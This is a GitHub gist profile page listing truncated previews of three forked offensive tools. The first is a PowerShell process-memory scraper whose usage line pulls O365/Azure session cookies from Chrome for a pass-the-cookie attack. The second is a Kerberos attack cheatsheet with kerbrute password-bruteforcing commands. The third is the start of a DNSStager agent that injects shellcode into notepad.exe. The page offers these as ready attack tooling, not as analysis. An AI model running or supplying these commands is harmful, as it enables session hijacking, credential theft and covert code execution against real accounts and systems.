Skip to content

Instantly share code, notes, and snippets.

View th3k3ymak3r's full-sized avatar

th3k3ymak3r th3k3ymak3r

17 followers · 28 following
  • The Matrix
View GitHub Profile
@th3k3ymak3r
th3k3ymak3r / Process_String_Extractor.ps1
Created May 9, 2023 13:24 — forked from LuemmelSec/Process_String_Extractor.ps1
A wrapper for strings2.exe to extract sensitive info out of processes
# This scriplet relies on https://github.com/glmcdona/strings2
# Import the script: PS> import-module .\Process_String_Extractor.ps1
# Run the function: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname notepad -SearchString "Hello World"
# To extract Cookies for O365 / Azure PTC Attack: PS> ScrapeProcessMemory -Strings2Path "D:\Tools\Strings2.exe" -Processname chrome -SearchString "ESTSAUTH","SignInStateCookie"
function ScrapeProcessMemory {
    Param(
        [Parameter(Mandatory)]
        [string]$Processname,
[Parameter(Mandatory)]
@th3k3ymak3r
th3k3ymak3r / kerberos_attacks_cheatsheet.md
Created February 7, 2022 00:10 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@th3k3ymak3r
th3k3ymak3r / client-ipv6-generic.c
Created January 24, 2022 02:34 — forked from mhaskar/client-ipv6-generic.c
DNSStager v1.0 beta agent to inject the retrived shellcode in notepad.exe and using Early Bird APC
#include <stdint.h>
#include <inttypes.h>
#include <winsock2.h>
#include <windns.h>
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>